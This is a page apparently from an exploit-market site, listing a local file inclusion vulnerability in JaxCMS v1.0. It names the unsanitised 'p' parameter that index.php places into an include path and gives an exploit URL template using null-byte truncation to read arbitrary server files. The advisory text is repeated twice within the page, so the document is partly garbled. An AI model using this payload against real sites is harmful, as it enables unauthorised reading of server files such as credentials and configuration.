[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

JaxCMS v1.0 Local File Include Vulnerability

Author
n/a
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10792
Category
web applications
Date add
08-02-2010
Platform
unsorted
============================================
JaxCMS v1.0 Local File Include Vulnerability
============================================


/*
 
Name : JaxCMS (p) Local File Include
WebSite : http://www.pixiescripts.com/
 
Author : Hamza 'MizoZ' N.
 
*/
 
The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php'
 
So we can read any file in the server .
 
EXPLOIT :
 
http://server/[JaxCMS PATH]/index.php?p=[LFI]%00/*
 
Name : JaxCMS (p) Local File Include
WebSite : http://www.pixiescripts.com/
 
Author : Hamza 'MizoZ' N.
 
*/
 
The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php'
 
So we can read any file in the server .
 
EXPLOIT :
 
http://server/[JaxCMS PATH]/index.php?p=[LFI]%00



#  0day.today [2024-11-16]  #